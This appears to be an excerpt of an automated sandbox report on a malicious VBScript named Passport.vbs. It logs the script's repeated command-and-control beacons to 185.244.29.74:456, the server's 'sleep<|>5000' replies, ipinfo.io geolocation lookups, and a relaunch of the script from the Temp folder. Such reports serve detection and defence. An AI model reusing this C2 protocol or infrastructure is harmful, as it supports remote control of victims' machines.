                                            Oct 1, 2024 11:04:57.353066921 CEST49730456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:57.353271008 CEST49730456192.168.2.5185.244.29.74
                                            Oct 1, 2024 11:04:57.358089924 CEST45649730185.244.29.74192.168.2.5
                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 1, 2024 11:00:58.259149075 CEST5414953192.168.2.51.1.1.1
                                            Oct 1, 2024 11:00:58.266417027 CEST53541491.1.1.1192.168.2.5
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Oct 1, 2024 11:00:58.259149075 CEST192.168.2.51.1.1.10x4328Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Oct 1, 2024 11:00:58.266417027 CEST1.1.1.1192.168.2.50x4328No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                            • ipinfo.io
                                            • 185.244.29.74:456
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549706185.244.29.744565276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:00:59.742336035 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:01:00.574543953 CEST84INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Server: Indy/9.0.18


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549709185.244.29.744565752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:01:12.799550056 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:01:13.608066082 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549716185.244.29.744565276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:01:31.706521034 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:01:32.517271042 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.549717185.244.29.744565752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:01:44.768646002 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:01:45.691143036 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.549719185.244.29.744565276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:02:03.627883911 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:02:04.437534094 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.549720185.244.29.744565752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:02:16.831486940 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:02:17.643846035 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.549721185.244.29.744565276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:02:35.567428112 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:02:36.380686045 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.549722185.244.29.744565752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:02:48.783741951 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:02:49.589329958 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.549723185.244.29.744565276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:03:07.574738026 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:03:08.380716085 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.549724185.244.29.744565752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:03:20.703315020 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:03:21.517085075 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.549725185.244.29.744565276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:03:39.503453016 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:03:40.325642109 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.549726185.244.29.744565752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:03:52.642071009 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:03:53.466299057 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.549727185.244.29.744565276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:04:11.456177950 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:04:12.275533915 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.549728185.244.29.744565752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:04:24.595041990 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:04:25.421895027 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.549729185.244.29.744565276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:04:43.410209894 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:04:44.245315075 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.549730185.244.29.744565752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            Oct 1, 2024 11:04:56.530431986 CEST226OUTPOST /document HTTP/1.1
                                            Accept: */*
                                            User-Agent: B81A4609
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            Host: 185.244.29.74:456
                                            Content-Length: 0
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache
                                            Oct 1, 2024 11:04:57.352982044 CEST116INHTTP/1.1 200 OK
                                            Connection: close
                                            Content-Type: text/html
                                            Content-Length: 12
                                            Server: Indy/9.0.18
                                            Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30
                                            Data Ascii: sleep<|>5000


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.54970434.117.59.814435276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-01 09:00:58 UTC320OUTGET /country HTTP/1.1
                                            Accept: */*
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: ipinfo.io
                                            Connection: Keep-Alive
                                            2024-10-01 09:00:58 UTC448INHTTP/1.1 200 OK
                                            access-control-allow-origin: *
                                            Content-Length: 3
                                            content-type: text/html; charset=utf-8
                                            date: Tue, 01 Oct 2024 09:00:58 GMT
                                            referrer-policy: strict-origin-when-cross-origin
                                            x-content-type-options: nosniff
                                            x-frame-options: SAMEORIGIN
                                            x-xss-protection: 1; mode=block
                                            via: 1.1 google
                                            strict-transport-security: max-age=2592000; includeSubDomains
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                            Connection: close
                                            2024-10-01 09:00:58 UTC3INData Raw: 55 53 0a
                                            Data Ascii: US


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.54970534.117.59.814435276C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-01 09:00:59 UTC316OUTGET /org HTTP/1.1
                                            Accept: */*
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: ipinfo.io
                                            Connection: Keep-Alive
                                            2024-10-01 09:00:59 UTC449INHTTP/1.1 200 OK
                                            access-control-allow-origin: *
                                            Content-Length: 27
                                            content-type: text/html; charset=utf-8
                                            date: Tue, 01 Oct 2024 09:00:59 GMT
                                            referrer-policy: strict-origin-when-cross-origin
                                            x-content-type-options: nosniff
                                            x-frame-options: SAMEORIGIN
                                            x-xss-protection: 1; mode=block
                                            via: 1.1 google
                                            strict-transport-security: max-age=2592000; includeSubDomains
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                            Connection: close
                                            2024-10-01 09:00:59 UTC27INData Raw: 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 0a
                                            Data Ascii: AS3356 Level 3 Parent, LLC


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.54970734.117.59.814435752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-01 09:01:12 UTC320OUTGET /country HTTP/1.1
                                            Accept: */*
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: ipinfo.io
                                            Connection: Keep-Alive
                                            2024-10-01 09:01:12 UTC448INHTTP/1.1 200 OK
                                            access-control-allow-origin: *
                                            Content-Length: 3
                                            content-type: text/html; charset=utf-8
                                            date: Tue, 01 Oct 2024 09:01:12 GMT
                                            referrer-policy: strict-origin-when-cross-origin
                                            x-content-type-options: nosniff
                                            x-frame-options: SAMEORIGIN
                                            x-xss-protection: 1; mode=block
                                            via: 1.1 google
                                            strict-transport-security: max-age=2592000; includeSubDomains
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                            Connection: close
                                            2024-10-01 09:01:12 UTC3INData Raw: 55 53 0a
                                            Data Ascii: US


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.54970834.117.59.814435752C:\Windows\System32\wscript.exe
                                            TimestampBytes transferredDirectionData
                                            2024-10-01 09:01:12 UTC316OUTGET /org HTTP/1.1
                                            Accept: */*
                                            Accept-Language: en-ch
                                            UA-CPU: AMD64
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: ipinfo.io
                                            Connection: Keep-Alive
                                            2024-10-01 09:01:12 UTC449INHTTP/1.1 200 OK
                                            access-control-allow-origin: *
                                            Content-Length: 27
                                            content-type: text/html; charset=utf-8
                                            date: Tue, 01 Oct 2024 09:01:12 GMT
                                            referrer-policy: strict-origin-when-cross-origin
                                            x-content-type-options: nosniff
                                            x-frame-options: SAMEORIGIN
                                            x-xss-protection: 1; mode=block
                                            via: 1.1 google
                                            strict-transport-security: max-age=2592000; includeSubDomains
                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                            Connection: close
                                            2024-10-01 09:01:12 UTC27INData Raw: 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 0a
                                            Data Ascii: AS3356 Level 3 Parent, LLC


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:05:00:56
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"
                                            Imagebase:0x7ff7efb00000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            Target ID:2
                                            Start time:05:01:09
                                            Start date:01/10/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs"
                                            Imagebase:0x7ff7efb00000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:false

                                            No disassembly